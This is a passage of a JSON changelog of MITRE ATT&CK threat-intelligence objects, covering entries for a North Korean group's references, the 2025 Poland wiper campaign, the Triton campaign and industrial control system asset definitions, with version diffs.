                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/groups/G0082",
                            "external_id": "G0082"
                        },
                        {
                            "source_name": "BeagleBoyz",
                            "description": "(Citation: CISA AA20-239A BeagleBoyz August 2020)"
                        },
                        {
                            "source_name": "Stardust Chollima",
                            "description": "(Citation: CrowdStrike Stardust Chollima Profile April 2018)(Citation: CrowdStrike GTR 2021 June 2021)"
                        },
                        {
                            "source_name": "APT38",
                            "description": "(Citation: FireEye APT38 Oct 2018)"
                        },
                        {
                            "source_name": "Bluenoroff",
                            "description": "(Citation: Kaspersky Lazarus Under The Hood Blog 2017)"
                        },
                        {
                            "source_name": "Sapphire Sleet",
                            "description": "(Citation: Microsoft Threat Actor Naming July 2023)"
                        },
                        {
                            "source_name": "COPERNICIUM",
                            "description": "(Citation: Microsoft Threat Actor Naming July 2023)"
                        },
                        {
                            "source_name": "NICKEL GLADSTONE",
                            "description": "(Citation: SecureWorks NICKEL GLADSTONE profile Sept 2021)"
                        },
                        {
                            "source_name": "CrowdStrike GTR 2021 June 2021",
                            "description": "CrowdStrike. (2021, June 7). CrowdStrike 2021 Global Threat Report. Retrieved September 29, 2021.",
                            "url": "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf"
                        },
                        {
                            "source_name": "DOJ North Korea Indictment Feb 2021",
                            "description": "Department of Justice. (2021, February 17). Three North Korean Military Hackers Indicted in Wide-Ranging Scheme to Commit Cyberattacks and Financial Crimes Across the Globe. Retrieved June 9, 2021.",
                            "url": "https://www.justice.gov/opa/pr/three-north-korean-military-hackers-indicted-wide-ranging-scheme-commit-cyberattacks-and"
                        },
                        {
                            "source_name": "CISA AA20-239A BeagleBoyz August 2020",
                            "description": "DHS/CISA. (2020, August 26). FASTCash 2.0: North Korea's BeagleBoyz Robbing Banks. Retrieved September 29, 2021.",
                            "url": "https://us-cert.cisa.gov/ncas/alerts/aa20-239a"
                        },
                        {
                            "source_name": "FireEye APT38 Oct 2018",
                            "description": "FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved November 17, 2024.",
                            "url": "https://services.google.com/fh/files/misc/apt38-un-usual-suspects.pdf"
                        },
                        {
                            "source_name": "Kaspersky Lazarus Under The Hood Blog 2017",
                            "description": "GReAT. (2017, April 3). Lazarus Under the Hood. Retrieved April 17, 2019.",
                            "url": "https://securelist.com/lazarus-under-the-hood/77908/"
                        },
                        {
                            "source_name": "CrowdStrike Stardust Chollima Profile April 2018",
                            "description": "Meyers, Adam. (2018, April 6). Meet CrowdStrike\u2019s Adversary of the Month for April: STARDUST CHOLLIMA. Retrieved September 29, 2021.",
                            "url": "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-april-stardust-chollima/"
                        },
                        {
                            "source_name": "Microsoft Threat Actor Naming July 2023",
                            "description": "Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.",
                            "url": "https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide"
                        },
                        {
                            "source_name": "SecureWorks NICKEL GLADSTONE profile Sept 2021",
                            "description": "SecureWorks. (2021, September 29). NICKEL GLADSTONE Threat Profile. Retrieved September 29, 2021.",
                            "url": "https://www.secureworks.com/research/threat-profiles/nickel-gladstone"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Hiroki Nagahama, NEC Corporation",
                        "Manikantan Srinivasan, NEC Corporation India",
                        "Pooja Natarajan, NEC Corporation India"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack",
                        "ics-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "3.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-11-13 19:21:05.133000+00:00\", \"old_value\": \"2025-01-22 21:54:11.727000+00:00\"}, \"root['external_references'][11]['url']\": {\"new_value\": \"https://services.google.com/fh/files/misc/apt38-un-usual-suspects.pdf\", \"old_value\": \"https://www.mandiant.com/sites/default/files/2021-09/rpt-apt38-2018-web_v5-1.pdf\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
                    "previous_version": "3.1"
                }
            ],
            "revocations": [],
            "deprecations": [],
            "deletions": []
        },
        "campaigns": {
            "additions": [
                {
                    "type": "campaign",
                    "spec_version": "2.1",
                    "id": "campaign--a6aba167-5ada-4812-9da1-912c0e73335d",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-22 19:33:22.532000+00:00",
                    "modified": "2026-04-23 23:21:30.984000+00:00",
                    "name": "2025 Poland Wiper Attacks",
                    "description": "[2025 Poland Wiper Attacks](https://attack.mitre.org/campaigns/C0063) is a Russian state-sponsored campaign that conducted destructive cyberattacks against Polish energy infrastructure in December 2025. Targets included more than 30 wind and photovoltaic farms, a combined heat and power (CHP) plant, and a manufacturing sector company. The attacks on the distributed energy resources (DER) disrupted communications between affected facilities and the distribution system operator, but did not impact electricity generation or heat supply. Across the campaign, threat actors deployed two previously undocumented wiper tools, [DynoWiper](https://attack.mitre.org/software/S9038), a Windows-based wiper and [LazyWiper](https://attack.mitre.org/software/S9039), a PowerShell wiper, distributed via malicious Group Policy Objects. At the CHP plant, threat actors had maintained access since at least March 2025, using that foothold to obtain credentials and move laterally before attempting wiper deployment. Some reporting has assessed the activity to be consistent with Russian Federal Security Service (FSB) threat activity group [Dragonfly](https://attack.mitre.org/groups/G0035), also tracked as STATIC TUNDRA, while other reporting attributes the destructive wiper activities to the Russian General Staff Main Intelligence Directorate (GRU) threat activity group ELECTRUM, also tracked as [Sandworm Team](https://attack.mitre.org/groups/G0034).(Citation: CERT Polska)(Citation: Dragos ELECTRUM JAN 2026)(Citation: ESET DynoWiper JAN 2026)(Citation: ESET DynoWiper Update JAN 2026)",
                    "aliases": [
                        "2025 Poland Wiper Attacks",
                        "2025 Poland Wiper Campaign"
                    ],
                    "first_seen": "2025-03-01 05:00:00+00:00",
                    "last_seen": "2025-12-01 05:00:00+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/campaigns/C0063",
                            "external_id": "C0063"
                        },
                        {
                            "source_name": "CERT Polska",
                            "description": "CERT Polska. (2026, January 30). Energy Sector Incident  Report \u2013 29 December. Retrieved April 22, 2026.",
                            "url": "https://cert.pl/uploads/docs/CERT_Polska_Energy_Sector_Incident_Report_2025.pdf"
                        },
                        {
                            "source_name": "ESET DynoWiper Update JAN 2026",
                            "description": "ESET. (2026, January 30). DynoWiper update: Technical analysis and attribution. Retrieved April 22, 2026.",
                            "url": "https://www.welivesecurity.com/en/eset-research/dynowiper-update-technical-analysis-attribution/"
                        },
                        {
                            "source_name": "ESET DynoWiper JAN 2026",
                            "description": "ESET. (2026, January 30). Russian Sandworm group attacks energy company in Poland with DynoWiper, ESET Research discovers. Retrieved April 22, 2026.",
                            "url": "https://www.eset.com/us/about/newsroom/research/eset-research-russian-sandwormapt-attacks-energy-company-poland-with-dynowiper/"
                        },
                        {
                            "source_name": "Dragos ELECTRUM JAN 2026",
                            "description": "https://5943619.hs-sites.com/hubfs/Reports/dragos-2025-poland-attack-report.pdf. (2026, January). ELECTRUM: CYBER ATTACK ON POLAND\u2019S ELECTRIC SYSTEM 2025. Retrieved April 22, 2026.",
                            "url": "https://5943619.hs-sites.com/hubfs/Reports/dragos-2025-poland-attack-report.pdf"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Dragos Threat Intelligence"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_first_seen_citation": "(Citation: CERT Polska)(Citation: Dragos ELECTRUM JAN 2026)",
                    "x_mitre_last_seen_citation": "(Citation: CERT Polska)(Citation: Dragos ELECTRUM JAN 2026)",
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "1.0"
                }
            ],
            "major_version_changes": [],
            "minor_version_changes": [
                {
                    "type": "campaign",
                    "spec_version": "2.1",
                    "id": "campaign--45a98f02-852f-49b2-94c0-c63207bebbbf",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2024-03-25 17:47:37.619000+00:00",
                    "modified": "2026-04-23 00:24:57.457000+00:00",
                    "name": "Triton Safety Instrumented System Attack",
                    "description": "[Triton Safety Instrumented System Attack](https://attack.mitre.org/campaigns/C0030) was a campaign employed by [TEMP.Veles](https://attack.mitre.org/groups/G0088) which leveraged the [Triton](https://attack.mitre.org/software/S1009) malware framework against a petrochemical organization.(Citation: Triton-EENews-2017) The malware and techniques used within this campaign targeted specific Triconex [Safety Controller](https://attack.mitre.org/assets/A0010)s within the environment.(Citation: FireEye TRITON 2018) The incident was eventually discovered due to a safety trip that occurred as a result of an issue in the malware.(Citation: FireEye TRITON 2017)\n",
                    "aliases": [
                        "Triton Safety Instrumented System Attack"
                    ],
                    "first_seen": "2017-06-01 04:00:00+00:00",
                    "last_seen": "2017-08-01 04:00:00+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/campaigns/C0030",
                            "external_id": "C0030"
                        },
                        {
                            "source_name": "Triton-EENews-2017",
                            "description": "Blake Sobczak. (2019, March 7). The inside story of the world\u2019s most dangerous malware. Retrieved March 25, 2024.",
                            "url": "https://www.eenews.net/articles/the-inside-story-of-the-worlds-most-dangerous-malware/"
                        },
                        {
                            "source_name": "FireEye TRITON 2017",
                            "description": "Johnson, B, et. al. (2017, December 14). Attackers Deploy New ICS Attack Framework \"TRITON\" and Cause Operational Disruption to Critical Infrastructure. Retrieved January 6, 2021.",
                            "url": "https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html"
                        },
                        {
                            "source_name": "FireEye TRITON 2018",
                            "description": "Miller, S. Reese, E. (2018, June 7). A Totally Tubular Treatise on TRITON and TriStation. Retrieved November 17, 2024.",
                            "url": "https://web.archive.org/web/20200618231942/https://www.fireeye.com/blog/threat-research/2018/06/totally-tubular-treatise-on-triton-and-tristation.html"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_first_seen_citation": "(Citation: Triton-EENews-2017)",
                    "x_mitre_last_seen_citation": "(Citation: Triton-EENews-2017)",
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['spec_version']\": \"2.1\"}, \"dictionary_item_removed\": {\"root['x_mitre_domains']\": [\"ics-attack\", \"enterprise-attack\"]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-23 00:24:57.457000+00:00\", \"old_value\": \"2024-11-17 16:15:02.223000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1"
                }
            ],
            "other_version_changes": [],
            "patches": [],
            "revocations": [],
            "deprecations": [],
            "deletions": []
        },
        "assets": {
            "additions": [],
            "major_version_changes": [],
            "minor_version_changes": [
                {
                    "type": "x-mitre-asset",
                    "spec_version": "2.1",
                    "id": "x-mitre-asset--973bc51e-c41e-4cec-ac03-9389c71f3d0d",
                    "created": "2023-09-28T14:58:00.982Z",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/assets/A0008",
                            "external_id": "A0008"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "modified": "2026-04-23T01:01:24.568Z",
                    "name": "Application Server",
                    "description": "Application servers are used across many different sectors to host various diverse software applications necessary to supporting the ICS. Example functions can include data analytics and reporting, alarm management, and the management/coordination of different control servers.  The application server typically runs on a modern server operating system (e.g., MS Windows Server).",
                    "x_mitre_sectors": [
                        "General"
                    ],
                    "x_mitre_related_assets": [
                        {
                            "name": "File Server",
                            "related_asset_sectors": [
                                "General"
                            ],
                            "description": "Server designed to house files within the ICS environment and/or securely transfer files between the ICS and enterprise networks."
                        },
                        {
                            "name": "License Server",
                            "related_asset_sectors": [
                                "General"
                            ],
                            "description": "Vendor-specific server that operates and maintains application licenses for different ICS applications to prevent computers from reaching across the ICS/enterprise network boundary directly."
                        },
                        {
                            "name": "Update / Patch Management Server",
                            "related_asset_sectors": [
                                "General"
                            ],
                            "description": "Server capable of providing updates and/or patches to computers with general purpose operating systems (e.g. MS Windows or Linux) within the ICS environment to prevent computers from reaching across the ICS/enterprise network boundary directly."
                        },
                        {
                            "name": "Domain Controller (DC)",
                            "related_asset_sectors": [
                                "General"
                            ],
                            "description": "MS Windows server used for enforcing security policies and role-based access control (RBAC) rules and managing identity and access management (IAM) policies within a network."
                        },
                        {
                            "name": "Database Server",
                            "related_asset_sectors": [
                                "General"
                            ],
                            "description": "MS Windows (primarily) server used for tracking long-term point information, control sheets, license information, trends, etc.  Paired with a Domain Controller and in some cases may be installed on the same machine functioning as a domain controller. MS SQL & Oracle are common types of database software found. "
                        },
                        {
                            "name": "Alarm Collector",
                            "related_asset_sectors": [
                                "General"
                            ],
                            "description": "Server that is a target of device/server alarms for a distributed system.  Some workstations or servers may have the job as the alarm collector and may only be a process/service running on the machine. "
                        },
                        {
                            "name": "Asset Management Server",
                            "related_asset_sectors": [
                                "General"
                            ],
                            "description": "A vendor-specific piece of software that collects information about vendor hardware or allows for configuration of that hardware (i.e., FactoryTalk Asset Center).  May also be known as: Field Device Management. "
                        },
                        {
                            "name": "Telemetry Server",
                            "related_asset_sectors": [
                                "General"
                            ],
                            "description": "Servers that collect Layer 2 communications or information and send via Layer 3 to other network segments or outside the control zone for collection (examples: PI Feeder, Remote Data Server).  "
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux",
                        "Windows"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "ics-attack"
                    ],
                    "x_mitre_version": "2.1",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2023-09-28T14:58:00.982Z\", \"old_value\": \"2023-09-28 14:58:00.982000+00:00\"}, \"root['modified']\": {\"new_value\": \"2026-04-23T01:01:24.568Z\", \"old_value\": \"2025-10-22 15:13:16.424000+00:00\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.1\", \"old_value\": \"2.0\"}}}",
                    "previous_version": "2.0",
                    "version_change": "2.0 \u2192 2.1"
                },
                {
                    "type": "x-mitre-asset",
                    "spec_version": "2.1",
                    "id": "x-mitre-asset--ecb81a8b-022e-4529-a404-55cffca7d3a3",
                    "created": "2023-09-28T14:55:39.339Z",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/assets/A0007",
                            "external_id": "A0007"
                        },
                        {
                            "source_name": "Guidance - NIST SP800-82",
                            "description": "Keith Stouffer. (2015, May). Guide to Industrial Control Systems (ICS) Security. Retrieved March 28, 2018.",
                            "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "modified": "2026-04-23T01:04:14.767Z",
                    "name": "Control Server",
                    "description": "Control servers are typically a software platform that runs on a modern server operating system (e.g., MS Windows Server). The server typically uses one or more automation protocols (e.g., Modbus, DNP3) to communicate with the various low-level control devices such as Remote Terminal Units (RTUs) and Programmable Logic Controllers (PLCs). The control server also usually provides an interface/network service to connect with an HMI.",
                    "x_mitre_sectors": [
                        "General"
                    ],
                    "x_mitre_related_assets": [
                        {
                            "name": "Supervisory Control And Data Acquisition (SCADA) Server",
                            "related_asset_sectors": [
                                "General",
                                "Electric",
                                "Water and Wastewater"
                            ],
                            "description": "A SCADA server is used to perform monitoring and control across a distributed environment. It typically has an associated HMI to provide information to a human operator and heavily depends on the human operator to initiate control actions."
                        },
                        {
                            "name": "Master Terminal Unit (MTU)",
                            "related_asset_sectors": [
                                "General"
                            ],
                            "description": "*A controller that also acts as a server that hosts the control software that communicates with lower-level control devices, such as remote terminal units (RTUs) and programmable logic controllers (PLCs), over an ICS network* (Citation: Guidance - NIST SP800-82)"
                        },
                        {
                            "name": "Supervisory Controller",
                            "related_asset_sectors": [
                                "General"
                            ],
                            "description": "*A controller that also acts as a server that hosts the control software that communicates with lower-level control devices, such as remote terminal units (RTUs) and programmable logic controllers (PLCs), over an ICS network* (Citation: Guidance - NIST SP800-82)"
                        },
                        {
                            "name": "Distribution/Energy Management System (DMS/EMS)",
                            "related_asset_sectors": [
                                "Electric"
                            ],
                            "description": "A DMS and EMS are electric sector-specific systems that are commonly used to manage distribution and transmission-level electrical grids. These systems typically integrate a SCADA server and HMI with domain-specific data analysis applications, such as state-estimation and contingency analysis (EMS), or voltage-var control or fault restoration (DMS). These systems also maintain visibility (and in some cases control) through a variety of integrated and distributed automation systems. "
                        },
                        {
                            "name": "Building Management / Automation System (BMS / BAS)",
                            "related_asset_sectors": [
                                "General"
                            ],
                            "description": "A controller (or set of controllers) that manages functionality for many common commercial / industrial buildings, such as heating, ventilation, and air conditioning (HVAC), lighting, elevators, etc."
                        },
                        {
                            "name": "Manufacturing Execution System (MES)",
                            "related_asset_sectors": [
                                "Manufacturing"
                            ],
                            "description": "A controller that oversees the performance, efficiency, life cycle, and resourcing for a manufacturing process within the ICS environment at a facility. A MES may interact with an Enterprise Resource Planning (ERP) system in the business environment to coordinate resourcing and job planning."
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Embedded",
                        "Linux",
                        "Windows"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "ics-attack"
                    ],
                    "x_mitre_version": "2.1",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2023-09-28T14:55:39.339Z\", \"old_value\": \"2023-09-28 14:55:39.339000+00:00\"}, \"root['modified']\": {\"new_value\": \"2026-04-23T01:04:14.767Z\", \"old_value\": \"2025-10-21 19:58:01.290000+00:00\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.1\", \"old_value\": \"2.0\"}}}",
                    "previous_version": "2.0",
                    "version_change": "2.0 \u2192 2.1"
                },
                {
                    "type": "x-mitre-asset",
                    "spec_version": "2.1",
                    "id": "x-mitre-asset--68388d4f-8138-420b-be2b-5a7dfe9ff6b4",
                    "created": "2023-09-28T15:01:48.509Z",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/assets/A0009",
                            "external_id": "A0009"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "modified": "2026-04-27T17:47:40.077Z",
                    "name": "Data Gateway",
                    "description": "Data Gateway is a device that supports the communication and exchange of data between different systems, networks, or protocols within the ICS. Different types of data gateways are used to perform various functions, including:\n\n *  <u>Protocol Translation:</u> Enable communication to devices that support different or incompatible protocols by translating information from one protocol to another. \n *  <u>Media Converter:</u> Convert data across different Layer 1 and 2 network protocols / mediums, for example, converting from Serial to Ethernet. \n *  <u>Data Aggregation:</u> Collect and combine data from different devices into one consistent format and protocol interface. \n*  <u>Data Mirroring:</u> Create a real-time, exact copy of data streams from devices to a separate destination for redundancy, monitoring, or backup purposes.\n\nData gateways are often critical to the forwarding/transmission of critical control or monitoring data within the ICS. Further, these devices often have remote various network services that are used to communicate across different zones or networks.  \n\nThese assets may focus on a single function listed below or combinations of these functions to best fit the industry use-case. \n",
                    "x_mitre_sectors": [
                        "General"
                    ],
                    "x_mitre_related_assets": [
                        {
                            "name": "Data Acquisition Server (DAS)",
                            "related_asset_sectors": [
                                "General"
                            ],
                            "description": "A Data Acquisition Server (DAS) a system or software platform that is used to collect, aggregate, and store data/telemetry from field devices using various SCADA/Automation protocols. "
                        },
                        {
                            "name": "Serial to Ethernet Gateway",
                            "related_asset_sectors": [
                                "Electric",
                                "General"
                            ],
                            "description": "A Serial to Ethernet gateway is a device that is used to connect field devices that only support serial-based communication (e.g., RS-232) with more modern Ethernet-based networks. "
                        },
                        {
                            "name": "Industrial Edge",
                            "related_asset_sectors": [
                                "General"
                            ],
                            "description": "Devices that may house a cellular or other type of communication stack that is outside the normal network path. May be bi-directional access by outside parties or unidirectional by design to allow for feeding of data to outside areas such as corporate, vendor, or cloud."
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows",
                        "Linux",
                        "Embedded",
                        "Network"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "ics-attack"
                    ],
                    "x_mitre_version": "2.1",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2023-09-28T15:01:48.509Z\", \"old_value\": \"2023-09-28 15:01:48.509000+00:00\"}, \"root['modified']\": {\"new_value\": \"2026-04-27T17:47:40.077Z\", \"old_value\": \"2025-10-21 19:43:43.474000+00:00\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.1\", \"old_value\": \"2.0\"}}}",
                    "previous_version": "2.0",
                    "version_change": "2.0 \u2192 2.1"
                },
                {
                    "type": "x-mitre-asset",
                    "spec_version": "2.1",
                    "id": "x-mitre-asset--e2c3336a-dd93-44d6-8246-f93cf132c499",
                    "created": "2023-09-28T14:48:36.305Z",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/assets/A0006",
                            "external_id": "A0006"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "modified": "2026-04-23T01:03:57.506Z",
                    "name": "Data Historian",
                    "description": "Data historians, or historian, are systems used to collect and store data, including telemetry, events, alerts, and alarms about the operational process and supporting devices. The historian typically utilizes a database to store this data, and commonly provide tools and interfaces to support the analysis of the data. Data historians are often used to support various engineering or business analysis functions and therefore commonly needs access from the corporate network. Data historians often work in a hierarchical paradigm where lower/site level historians collect and store data which is then aggregated into a site/plant level historian. Therefore, data historians often have remote services that can be accessed externally from the ICS network. Many data historian vendors have designed their software to securely transfer data between the ICS and business networks instead of requiring business systems to access the data historian in the ICS network directly.",
                    "x_mitre_sectors": [
                        "General"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Embedded",
                        "Linux",
                        "Windows"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "ics-attack"
                    ],
                    "x_mitre_version": "2.1",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2023-09-28T14:48:36.305Z\", \"old_value\": \"2023-09-28 14:48:36.305000+00:00\"}, \"root['modified']\": {\"new_value\": \"2026-04-23T01:03:57.506Z\", \"old_value\": \"2025-10-21 19:55:17.864000+00:00\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.1\", \"old_value\": \"2.0\"}}}",
                    "previous_version": "2.0",
                    "version_change": "2.0 \u2192 2.1"
                },
                {
                    "type": "x-mitre-asset",
                    "spec_version": "2.1",
                    "id": "x-mitre-asset--85f285f9-0a48-4998-921d-8a47d81c0e6d",
                    "created": "2025-09-24T22:53:09.627Z",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/assets/A0017",
                            "external_id": "A0017"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "modified": "2026-04-23T01:01:01.668Z",
                    "name": "Distributed Control System (DCS) Controller",
                    "description": "A Distributed Control System (DCS) Controller is a microprocessor unit that is used to manage automation processes. DCS Controllers are often found in plants (chemical, manufacturing, oil and gas, etc.) where large scale continuous automation processes are required. A DCS Controller typically operates as part of a larger networked system with other DCS Controllers where each DCS Controller manages an individual part of a continuous process. In addition to these other controllers, DCS Controllers operate along side multiple other system components including system software, operator stations, and other embedded field controllers. The distributed nature of DCS Controllers provides scalability, redundancy, and improved process reliability. DCS Controllers are programmed using traditional process automation programming languages (IEC-61131). ",
                    "x_mitre_sectors": [
                        "General"
                    ],
                    "x_mitre_related_assets": [
                        {
                            "name": "Field Device / Controller",
                            "related_asset_sectors": [
                                "General"
                            ],
                            "description": "Distributed Control System (DCS) Controller may be referred to as Field Controllers or Field Devices as a general function name."
                        },
                        {
                            "name": "Programmable Logic Controller (PLC)",
                            "related_asset_sectors": [
                                "General"
                            ],
                            "description": "Programmable Logic Controllers (PLC) share some of the same functionality as DCS Controllers, although often without more advanced control features. "
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Embedded"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "ics-attack"
                    ],
                    "x_mitre_version": "1.1",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-09-24T22:53:09.627Z\", \"old_value\": \"2025-09-24 22:53:09.627000+00:00\"}, \"root['modified']\": {\"new_value\": \"2026-04-23T01:01:01.668Z\", \"old_value\": \"2025-10-21 16:17:35.766000+00:00\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1"
                },
                {
                    "type": "x-mitre-asset",
                    "spec_version": "2.1",
                    "id": "x-mitre-asset--2b676abd-8263-49ea-81a4-78a7e1f776fe",
                    "created": "2023-09-28T17:57:22.946Z",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/assets/A0013",
                            "external_id": "A0013"
                        },
                        {
                            "source_name": "Guidance - NIST SP800-82",
                            "description": "Keith Stouffer. (2015, May). Guide to Industrial Control Systems (ICS) Security. Retrieved March 28, 2018.",
                            "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "modified": "2026-04-27T16:50:21.228Z",
                    "name": "Field I/O",
                    "description": "Field I/O are devices that communicate with a controller or data aggregator to either send input data or receive output data. Input data may include readings about a given environment/device state from sensors, while output data may include data sent back to actuators for them to either undertake actions or change parameter values.(Citation: Guidance - NIST SP800-82) These devices are frequently embedded devices running on lightweight embedded operating systems or RTOSes. ",
                    "x_mitre_sectors": [
                        "General"
                    ],
                    "x_mitre_related_assets": [
                        {
                            "name": "Smart Sensors",
                            "related_asset_sectors": [
                                "General"
                            ],
                            "description": "*A device that procures a voltage or current output that is representative of some physical property being measured (e.g., speed, temperature, flow).* (Citation: Guidance - NIST SP800-82) Smart sensors take this functionality and add on on-device processing and network communication."
                        },
                        {
                            "name": "Variable Frequency Drive (VFD)",
                            "related_asset_sectors": [
                                "General"
                            ],
                            "description": "*A type of drive that controls the speed, but not the precise position, of a non-servo, AC motor by varying the frequency of the electricity going to that motor. VFDs are typically used for applications where speed and power are important, but precise positioning is not.* (Citation: Guidance - NIST SP800-82) VFDs can be network connected."
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Embedded"
                    ],
                    "x_mitre_deprecated": false,
